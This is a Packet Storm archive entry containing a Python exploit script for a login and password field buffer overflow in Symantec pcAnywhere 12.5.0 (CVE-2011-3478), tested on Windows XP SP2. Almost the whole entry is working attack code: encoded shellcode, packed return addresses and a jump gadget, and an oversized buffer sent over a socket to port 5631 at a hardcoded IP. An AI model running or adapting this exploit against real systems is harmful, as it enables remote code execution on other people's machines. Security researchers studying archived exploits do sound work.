Symantec PcAnywhere 12.5.0 Buffer Overflow

2012-06-27T00:00:00
ID PACKETSTORM:114230
Type packetstorm
Reporter S2 Crew
Modified 2012-06-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow  
# Date: 2012.06.27  
# Author: S2 Crew [Hungary]  
# Software Link: symantec.com  
# Version: 12.5.0  
# Tested on: Windows XP SP2  
# CVE: CVE-2011-3478  
  
# Code :  
import socket  
import time  
import struct  
import string  
import sys  
  
shell = (  
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"  
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"  
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"  
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"  
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"  
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2"  
"\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5"  
"\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb"  
"\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b"  
"\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3"  
"\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74"  
"\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7"  
"\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34"  
"\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b"  
"\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0"  
"\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8"  
"\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04"  
"\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"  
"\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d"  
"\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4"  
"\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07"  
"\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee"  
"\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe"  
"\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33"  
"\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52"  
"\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6"  
"\xf1\xf1\x69\xe3"  
)  
init1 = (  
"\x00\x00\x00\x00" # kezdeti handshake  
)  
  
init2 = (  
"\x0d\x06\xfe" # Enter username uzenet koveti (NTdialog)  
)  
  
init3 = (  
"A" * 100 #+ "\r" #username  
)  
  
readable_xp_sp2 = struct.pack('<L',0x023E5AD0)  
call_esi = struct.pack('<L',0x67f7aac4)  
jmp = struct.pack('<L',0x414112EB)  
  
init4 = (  
"B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))  
)  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address  
  
print "init packet..."  
s.send(init1) # send the data  
time.sleep(5)  
data = s.recv(1024)  
  
print "handshake packet..."  
s.send(init2) # send the data  
time.sleep(5)  
data = s.recv(1024)  
  
print "username packet..."  
s.send(init3) # send the data  
time.sleep(5)  
#data = s.recv(1024)  
  
print "password packet..."  
s.send(init4) # send the data  
s.close()  
  
`